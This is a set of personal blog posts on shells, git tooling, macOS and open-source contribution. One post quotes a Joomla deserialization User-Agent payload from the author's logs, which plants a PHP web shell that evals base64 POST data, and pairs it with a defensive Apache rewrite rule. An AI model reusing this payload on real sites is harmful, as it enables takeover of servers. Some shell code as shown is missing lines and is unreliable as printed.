The difficulty in getting fixes accepted to open source projects

Two and a half years ago I noticed the Apache mod_dumpio module does not include null bytes (or the data which follows those null bytes) in its output. So I searched the Apache Bugzilla database and found bz#57045 which someone had opened a year earlier. So I wrote a patch and attached it to the bugzilla issue. When I noticed the issue I was using the then current 2.4.16 release. There have been 13 bug fix releases since then (it’s now at 2.4.29) and my fix still hasn’t been applied. I’m a senior software engineer with nearly four decades of experience. I’m pretty confident my fix is a) correct and b) well written. It really shouldn’t be this hard to get fixes made to open source software.

Working with git file names modified in the workspace or most recent commit

I frequently find myself wanting to perform an operation on all the files modified in the workspace or staging error. For example, run edit all the files or run them through a tool like clang-format or oclint. If there are no uncommitted changes I want to work with all the files in the most recent commit in the branch. To do this I wrote a gitfiles fish shell function (transforming this to bash should be trivial):

function gitfiles \
    --description 'Enumerate files in git workspace or head commit matching 0+ globs.'
    # -c: files with a C/C++ extension
    # -p: files with a .py extension
    argparse -n gitfiles c p -- $argv
    or return

    set -l patterns $argv
    if set -q _flag_c
        set -a patterns '*.c' '*.cpp' '*.h'
    if set -q _flag_p
        set -a patterns '*.py'

    # The `sed` below could be replaced with `string replace -r '^ *[^ ]* *' ''`.
    # However, doing so is unlikely to be measurably faster let alone noticed by a user.
    # It's also more likely to be misunderstood.
    set -l files (
        git status --porcelain --short --untracked-files=all | sed -e 's/^ *[^ ]* *//')
    if not set -q files[1]
        set files (git show --word-diff=porcelain --name-only --pretty=oneline)[2..-1]

    if set -q patterns[1]
        for pattern in $patterns
            string match $pattern $files
        end | sort -u
        printf '%s\n' $files

Note that it accepts globs to limit the files to those matching one or more patterns. If no globs are specified then all modified files are listed. It supports the -c flag to match C/C++ file names and -p to match python file names since those are the languages I work with the most often.

This makes it easy to type vim (gitfiles) (which I actually wrap in a gitvim fish function) to edit all the modified files.

Scheduling backups on macOS Sierra and High Sierra

MacOS Sierra (OS X 10.12) modified the behavior of Time Machine from doing hourly backups to using a heuristic that decides whether to do a backup based on recent activity. For most users that’s a better approach since it makes it less likely the user will notice the performance impact of backups and will increase how far back in time backups are available. However, if you’re a software developer the new behavior is problematic. That’s because when I’m writing code, do something stupid, and need to revert the project workspace to an earlier state I always want to be able to select a state in the near past. When backups occur at irregular intervals you might find that the most recent backup was made so long ago as to be borderline useless.

Configuring Time Machine to suit the needs of a software developer turns out to be surprisingly simple. Thanks to Apple providing not just simple to use GUIs but excellent CLI tools. In this case the command you need is tmutil. The first step is to disable automatic backups using the System Preferences GUI or by running sudo tmutil disable. The second step is to setup a cron job by running crontab -e and adding an entry like the following:

# Every hour during the times we're likely to be working do a Time Machine
# backup.
0 7-22 * * * tmutil startbackup

That initiates a backup at the top of every hour from 0700 to 2200 hours every day of the week. I skip the other eight hours of each day because I’m unlikely to be writing code at that time. Voila! Now I can be assured that if I need to recover from a stupid mistake that a simple git checkout can’t help with I won’t have to recover more than an hour’s worth of work.

Ksh93 has unexpected, undocumented, support for math functions

I have been thinking about whether I want to contribute to the maintenance of the Korn shell (ksh93) since it was open sourced in 2013. While trying to understand the organization of the project and how to build it I noticed that the math builtin (e.g., $(( ... )) ) supports a lot of functions I was not aware of despite having used the Korn shell for more than two decades. Consider these examples:

$ echo $(( nearbyint(12.5) ))
$ echo $(( round(12.5) ))
$ echo $(( rint(12.5) ))

Why in the world should a command line shell support multiple methods to round a floating point value to an integer? There are numerous other examples of that type and they all derive from the ksh authors thinking that exposing low-level APIs to a shell script was appropriate.

These functions are defined in src/cmd/ksh93/data/ None are documented outside of the source code other than a pro-forma mention in the documentation that they exist (see the section labeled “Arithmetic Evaluation” in the man page) as prefaced by this text:

Any of the following math library functions that are in the C math library can be used within an arithmetic expression:

These are the functions in that table:

# <return type: i:integer f:floating-point> [<typed -arg-bitmask> < #floating-point-args> <function -name> [
# </function><function -name>l and </function><function -name>f variants are handled by features/
# @(#) (AT&T Research) 2013-08-11
f 1 acos
f 1 acosh
f 1 asin
f 1 asinh
f 1 atan
f 2 atan2
f 1 atanh
f 1 cbrt
f 1 ceil
f 2 copysign
f 1 cos
f 1 cosh
f 1 erf
f 1 erfc
f 1 exp
f 1 exp10
f 1 exp2
f 1 expm1
f 1 fabs abs
f 2 fdim
i 1 finite
f 1 float
f 1 floor
f 3 fma
f 2 fmax
f 2 fmin
f 2 fmod
i 1 fpclassify
i 1 fpclass
f 2 hypot
i 1 ilogb
f 1 int
i 1 isfinite
i 2 isgreater
i 2 isgreaterequal
i 1 isinf
i 1 isinfinite
i 2 isless
i 2 islessequal
i 2 islessgreater
i 1 isnan
i 1 isnormal
i 1 issubnormal fpclassify=FP_SUBNORMAL
i 2 isunordered
i 1 iszero fpclassify=FP_ZERO fpclass=FP_NZERO|FP_PZERO {return a1==0.0||a1==-0.0;} j0
f 1 j1
f 2 jn
x 2 ldexp
f 1 lgamma
f 1 log
f 1 log10
f 1 log1p
f 1 log2
f 1 logb
f 1 nearbyint
f 1 2 nextafter
f 1 2 nexttoward
f 2 pow
f 2 remainder
f 1 rint
f 1 round {Sfdouble_t r;Sflong_t y;y=floor(2*a1);r=rint(a1);if(2*a1==y)r+=(r<a1 )-(a1<0);return r;}
f 2 scalb
f 2 scalbn
i 1 signbit
f 1 sin
f 1 sinh
f 1 sqrt
f 1 tan
f 1 tanh
f 1 tgamma {Sfdouble_t r=exp(lgamma(a1));return (signgam<0)?-r:r;}
f 1 trunc
f 1 y0
f 1 y1
f 2 yn

The only way I would contribute to the evolution of ksh93 is if this bogosity were eliminated. There is no reason that a CLI like ksh/ksh93 should support all of those math functions. In fact most of those functions have no business being available in a CLI. Consider what it means to execute $(( isfinite(1) )). In the context of a CLI shell script the isifinite() function has no meaning.

Is ksh93 still alive?

As I mentioned in my previous article I’m looking for a new shell since I’ve given up on the Fish project. For many years I used ksh88 then ksh93. After that I switched to zsh because it looked like ksh was a dead project. But two years ago the AT&T Software Technology (“AST”) toolkit was moved to Github and open sourced. In the past year an individual has committed some changes to the ksh source code. If it’s once again being improved it might be worth a look.

So in addition to elvish I think I’ll take another look at ksh. The Korn shell lacks many of the features people have come to expect from newer shells. Most notably a good command completion subsystem. But the ksh source code is pretty clean. It has a consistent style and good interfaces. There are things about its style I don’t like such as the use of single statement blocks that are not enclosed in braces since that pattern makes it too easy to introduce a bug and makes it harder to visually parse the code. Here’s an example from the getopts.c module:

                r = 0;

Still, at least the code is consistent in employing that pattern. It also omits whitespace around binary operators like minus and commas that separate parameters. At least most of time. Something I think hurts readability especially since it doesn’t do so 100% of the time. I’d probably want to run the code through clang-format and otherwise manually fix the remaining style inconsistencies before contributing more substantive changes. Much like I did for fish. The question is whether the people with commit privileges would accept such changes. And whether they would be open to the idea of implementing some of ideas from newer shells like fish.

Time to pick a new shell: fish, xonsh, elvish, bash, zsh, ksh93

Why aren’t there any good alternatives to bash or zsh? Specifically, a OS CLI shell that does not suffer from the problems inherent in being compliant with the POSIX.2 (aka POSIX 1003.2) standard? And also doesn’t suffer from the other problem that bash and zsh have due to all the configurable behaviors that make it effectively impossible to predict how those shells will behave?

Two years ago I got fed up with zsh and wrote a blog post why. That caused me to look for a saner alternative. I considered xonsh because it is based on Python which is one of my two favorite programming languages (the other being C). But I gave up on Xonsh fairly quickly. I eventually settled on Fish.

I had some misgivings about the Fish project because, as of Sep 2015, it had numerous open pull-requests. Including several more than a year old and quite a few more older than three months. The source code (both C++ and functions written in its native script language) was also a mess with no coherent style and hundreds of lint errors. At least two lint errors identified actual bugs and most of the remainder pointing out code that was hard to understand. Too, there were a couple hundred open issues more than three years old which even a cursory review suggested were no longer relevant. Nonetheless, I chose it as my new day to day shell and started contributing changes to the project. Primarily because its explicit non-adherence to the POSIX 1003.2 standard for shells meant it had far fewer surprising behaviors. It also had several innovative ideas such as every variable being an array even if it contained only a single element.

Near the end of 2015 I was offered commit privileges; that is, becoming a member of the core development team. I demurred at that time because I wasn’t sure I was going to use Fish long term. But in late January 2016 I accepted the invite to join the core dev team. Primarily because the development team expressed no objections to my requirement that the code style be standardized and changes to deal with oclint and cpplint errors would be merged without debate.

I spent several months doing things like running the code through clang-format and oclint and fixing problems they found. As well as making it easy for everyone else to do so by adding new build targets like make style and make lint. Once the code was in a better state I felt more comfortable making more substantive changes.

Fast-forward to today where I am looking for a different shell to be my day to day interactive shell. Why? There are several reasons. Such as the fact that the Fish model for I/O redirection and pipelines is broken and results in FAQs from people who expect saner behavior provided by nearly every other shell. Broken behavior I accepted till now because I hoped that such problems would be fixed sooner rather than later. I no longer believe that will happen. Again, why? Because there have been too many arguments over bike-shedding issues like whether all uppercase var names like FISH_HISTORY and FISH_VERSION should be renamed to lowercase. Or, in the case of FISH_VERSION, renamed to version because one developer is a fan of csh (actually tcsh although they never use that term). More importantly no one but myself seemed to be interested in setting a consistent vision for future releases with milestones and a roadmap.

Another example: Fish issue #478 was opened five years ago by xiaq to suggest improving how commands to options are handled. Keep in mind the ID of the person who opened that issue as it’s important to this blog post. I commented a year ago asking if we should implement a Fish compatible getopt command. Fast forward to today. I opened a new issue asking for feedback on a different approach to issue #478. Mostly because it seemed like the DocOpt based solution would never be implemented. Too, I was not convinced the DocOpt idea was sound. I implemented the argparse command and the feedback was uniformly positive and resulted in several subsequent improvements. The Fish developer I’ve clashed with from the day they were granted commit privileges then reopened issue #478 and the leader of the fish project stated they still wanted to try and implement that solution. I’m wondering if I’ll die of old age before that happens. Especially since it has been more than two years since the last substantive commit to the Python DocOpt project which has been open five years, and was the basis for the fish-shell implementation, and it still hasn’t reached v1.0 release status.

I have no intention of going back to either bash or zsh as my day to day interactive shell. They have too much baggage and broken behaviors. Zsh in particular suffers from a lack of a coherent vision which has lead to the project incorporating too many incompatible behaviors via configurable options.

So I’m once again looking for an innovative shell that I could use on a daily basis and would be willing to contribute non-trivial changes to the project. I took another look at Xonsh but was put off by the fact it has several pull-requests more than a year old and most of the others are more than a month old. Too, it has recently implemented things like the cat command as a builtin which seems rather pointless.

The current candidate for my new day to day shell is Elvish. It is even more extreme in its departure from traditional POSIX.2 shells than fish compared to shells like ksh, bash, and zsh. But therein lies its strength. Elvish is based on sound programming language principles rather than the adhoc mess that is the original Bourne shell and all subsequent, POSIX.2, based shells. My primary concern is how it handles external commands that exit with a non-zero status. At present it turns that into an exception. Which means Elvish behaves as if bash/ksh/zsh was running with set -o errexit in effect. This is great from a safety perspective. The problem is that there are a large number of commands which exit with a non-zero status for non-fatal situations. The grep command, for example, exits with status of one if no lines matched the pattern. That is rarely a fatal error that deserves raising an exception.

An interesting injection attach via the HTTP user agent string

Looking at my web server logs this morning I noticed a new attack signature. The attacker performs a “GET /” with this “User-Agent” header:

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9

It’s obviously a code injection attack. Googling tells me this attack was first documented in December 2015 such as in this writeup. It’s an attempt to inject code via a Joomla CMS vulnerability. I don’t use Joomla so this doesn’t affect my site.

I already had some Apache HTTPD rules to protect against malicious user agent strings including one to detect if it begins with a left bracket:

RewriteCond %{HTTP_USER_AGENT} ^\[ [OR]

Noticing this attack suggests that generalizing that rule would be helpful. So my Apache config now contains this instead:

# If first char isn't an alphanumeric or underscore it's quite possibly an
# attempt to inject code.
RewriteCond %{HTTP_USER_AGENT} ^\W [OR]

I got hacked

I really dislike both PHP and WordPress despite using the latter, and thus the former implicitly, for this blog. Why? Because both make it far to easy to be hacked. Which happened to me just a few days ago. Despite not installing any third-party WordPress plugins and having a robust firewall against malformed web requests and regularly updating my software. In this case someone exploited a WordPress 4.7.0/4.7.1 vulnerability recently introduced into its REST API. They managed to replace my most recent post prior to this one. Google “attack /index.php/wp-json/wp/v2/posts” to learn more about this vulnerability.

Fortunately I backup my WordPress database and was thus able to restore it to a known good state. And this particular vulnerability did not allow the attacker to change any files; only content in the WP database. I was fortunate because I make regular backups of critical files and have my web site managed by git source code management. The former made it relatively easy to recover from the hack and the latter made it easy to determine my static content had not been compromised.

Xonsh is no longer a possible replacement for zsh

A few weeks ago I wrote about my dissatisfaction with zsh. I decided to take a close look at xonsh and fish.

I decided to try xonsh first because I’m a Python aficionado (I’ve been using it as my primary language for eight years). The idea of using all of my favoriate Python language features and standard library along with the ease of launching external commands with I/O redirection and pipelines was intriguing. Because xonsh is currently at version 0.2.3 it was clear that the author didn’t believe it was ready for primetime. Nonetheless, I was willing to give it a try as the documentation and mailing list suggested it was in good enough shape for a software engineer like myself who is used to using software that is rapidly changing.

The first thing I did after installing it was run a few external commands and python statements. I then showed the command history using the builtin history command. So far, so good. I then tried showing the most recent command in the history using history show -1. That worked fine. Okay, let’s do something a little more challenging; show the most recent five history entries:

$ history show -5:
usage: history [-h] {show,id,file,info,diff,replay,gc} ...
history: error: unrecognized arguments: -5:

Oops! The documentation says that should work. The inverse, showing the first five entries with history show :5 does work. So I sent a mesasge to the mailing list. Almost immediately the creator of xonsh responded with a proposed fix in the form of a github pull request. Looking at the proposed fix I saw my first red flag. The fix was a kludge and included no unit tests to ensure that the fix was correct and to keep regressions from occurring. I countered with my own pull request that included extensive unit tests for the bug I was fixing.

I was happy to see that the author cares about fixing bugs in a timely manner. I was less happy that his proposed fix was something I would barely tolerate from a summer intern. Worse, before creating my fix I ran pylint against the module. OMFG! Pylint gave it a score of 7.13 out of 10. Worse, pylint pointed out two outright bugs due to misnamed variables. The only way to tell if my change introduced more lint was to diff the lint output before and after my fix was commited. That is totally unacceptable. Too, the entire code base was riddled with problems ranging from the nitpicking trivial (trailing whitespace on a line, lines too long) to serious (missing doc strings, too many references to protected object members).

I was also deeply troubled by such bogosities as injecting __xonsh_history__ and __xonsh_env__ into the builtins module scope. Not only that but those are the primary means of accessing xonsh configurable settings. Ugh! For example, from the module:

data_dir = builtins.__xonsh_env__.get('XONSH_DATA_DIR')

Despite that rocky start I thought there was enough positive things about the project to try using it and contributing to its improvement. But the code would have to be cleaned up before I would make any other substantive changes. So I asked it would be okay if I contributed a sequence of changes to make the code lint clean. Getting the green light I submitted several lint cleanup pull requests. Getting each one accepted was a challenge. Primarily because the project owner isn’t really interested in having lint clean code. The final straw that made me decide to give up on the project as hopeless were two cleanups the project owner objected to.

The first was changing

if len(inp) == 0:


if not inp:

Anthony told me to revert that because he didn’t like the negative conditional. The second was changing

for d in filter(os.path.isdir, path):


for d in (p for p in path if os.path.isdir(p)):

Anthony’s objection this time was that he prefers filter and map to list comprehension and generator functions. When I countered that filter and map are deprecated he said in effect “why are they builtins if they’re deprecated”. All you have to do is Google “python map filter deprecated”. One of the two five results is this article by Guido van Rossum proposing that map, filter, and reduce be removed from python3. There’s plenty of other web pages that also make the case for not using them.

In other words, Anthony tries to use Python as if it were a different language. He doesn’t appreciate that there is such as thing as idiomatic Python. Anthony believes that just because you can achieve a result in more than one way there is no reason to prefer one alternative over another other personal preference. Sorry, but I can’t contribute to a project with those ideals.

So I’m off to try fish.

P.S., I forgot to mention two other things that gave me a WTF moment. The first was when I noticed that the directions for running the unit tests did not test the code in my local git repository — it tested the code installed by pip. Running the tests were also not hermetic — they were affected by my local ~/.xonshrc file. Too, I couldn’t just type “make test” to execute the tests. So I decided to fix all of those problems. In the process of getting my changes accepted Anthony told me he wrote the directions to specifically test the installed code, not the code in his git repository and he didn’t understand why anyone would test their uncommitted code. So either he doesn’t test changes before committing them or he regularly installs and runs untested code.

Second, the history subsystem is weird. Don’t take my word for it, go read the xonsh history documentation. Notice too this only partially correct assertion in the first paragraph of that page: “This is saved when the shell exits”. Okay, that is true of bash but it’s not true of many other shells sharing the same Bourne shell lineage such as zsh. Also, bash provides history -a to manually save the history and history -r to read it so you’re not limited to writing the current shell history only when it exits. Yes, yes, that’s a pretty braindead approach so I agree with Anthony regarding bash but other shells like zsh have managed to implement a sane solution without requiring xonsh’s ridiculously over-engineered solution.

Mac OS X man command ignores $MANPATH (which sucks for HomeBrew installed commands)

I recently ran brew install coreutils to get the GNU versions of various commands such as ls. The first thing I noticed was that “man ls” did not display the man page for the GNU ls command. Even after setting the $MANPATH environment variable to include the relevant directory the man page was not displayed. Not even with “man -a ls” which should have shown all matching man pages in succession. The $MANPATH environment variable is completely ignored on Mac OS X as far as I can determine.

Similarly, editing /etc/manpaths and creating a file in /etc/manpaths.d containing the appropriate paths had no effect.

Only editing /etc/man.conf had any effect. Furthermore, it was not enough to simply add a MANPATH directive before any of the stock entries. Doing so did allow “man -a ls” to display the GNU ls man page but it was still not the primary man page. To make the GNU ls man page the primary I also had to add a MANPATH_MAP directive before any of the other MANPATH_MAP directives. Once I did that executing “man ls” and “man -w ls” shows the HomeBrew installed ls command man page as the primary documentation for that command.

Note that by default the man pages for HomeBrew commands that do not shadow standard commands are found and displayed by the man command. That is because a “MANPATH /usr/local/share/man” entry in /etc/man.conf is sufficient to find the associated man pages. It’s not clear whether that entry is present in a stock Mac OS X installation or is added by HomeBrew.

I love Mac OS X and would rather get a root canal than use MS Windows. But once in a while an annoyance like this one makes me wonder if anyone at Apple actually verifies that the software behaves as the documentations states.